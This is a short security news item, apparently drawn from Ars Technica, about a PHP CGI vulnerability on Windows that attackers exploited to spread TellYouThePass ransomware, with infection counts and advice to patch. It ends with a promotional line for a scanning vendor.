The vulnerability affects PHP when it runs in CGI mode, where a web server parses HTTP requests and passes them to a PHP script. Even without CGI mode, the vulnerability can be exploited if PHP executables are accessible by the web server, particularly on the XAMPP platform, which uses this configuration by default. The attack also requires the Windows locale to be set to Chinese or Japanese.
The vulnerability was disclosed on June 6, and within 24 hours, attackers began exploiting it to install the TellYouThePass ransomware. The attackers used the mshta.exe Windows binary to execute HTML application files from an attacker-controlled server, employing a technique known as living off the land, which uses native OS functionalities to avoid detection.
Censys researchers detected fluctuations in the number of infected servers, ranging from 670 to 1,800, with most infections geolocated to China, Taiwan, Hong Kong, or Japan. The lack of observed ransom payments suggests that many compromised servers may have been decommissioned or gone offline. Security experts urge administrators running PHP on any Windows system to install the latest updates promptly to prevent further exploitation.
Source: Arstechnica
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try yourself using check.website.